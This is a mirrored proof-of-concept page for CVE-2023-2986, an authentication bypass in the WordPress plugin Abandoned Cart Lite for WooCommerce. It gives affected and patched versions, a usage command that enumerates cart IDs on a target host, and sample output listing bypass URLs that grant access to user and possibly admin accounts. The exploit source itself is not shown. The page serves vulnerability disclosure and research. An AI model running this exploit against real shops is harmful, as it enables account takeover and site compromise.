Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-2986 PoC — WordPress Plugin Abandoned Cart Lite for WooCommerce 安全漏洞

Source
https://github.com/Ayantaker/CVE-2023-2986
Associated Vulnerability
Title:WordPress Plugin Abandoned Cart Lite for WooCommerce 安全漏洞 (CVE-2023-2986)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Abandoned Cart Lite for WooCommerce 5.14.2及之前版本存在安全漏洞。攻击者利用该漏洞以abandoned the cart的用户身份登录。
Description
Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress
Readme
# Original Proof of Concept for CVE-2023-2986

Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress


## Related Details

- NVD Link : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
- Plugin Source : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
- Vulnerable versions : <s>`version <= 5.14.2`</s> `version <= 5.15.1`
- Patched version : <s>`5.15.0`</s> `5.15.2`

### Update

- It was thought that version 5.15.0 fixes the issue but I found out that it wasn't completely fixed and same has been updated. So the actual patched version is `5.15.2`


## Vulnerability Analysis

- Keysight Blogs : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
- Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

## Usage

```bash
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
```

```
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

```

> Entering the URL in browser will give you access to the respective users account. If the wordpress admin user himself has an entry, this will give access to the admin console leading to full compromise of the wordpress server.


## Disclaimer

This Proof of Concept (POC) has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Author is not responsible or liable for any misuse of the POC. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/a7d56b6ba2d4191b7c08641cd2e5fbd9d1eb262b
├── [4.0K]  libs
│   ├── [8.7K]  class-wcal-aes.php
│   └── [6.8K]  encrypt.php
├── [ 18K]  LICENSE
├── [2.7K]  poc.php
└── [2.2K]  README.md

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.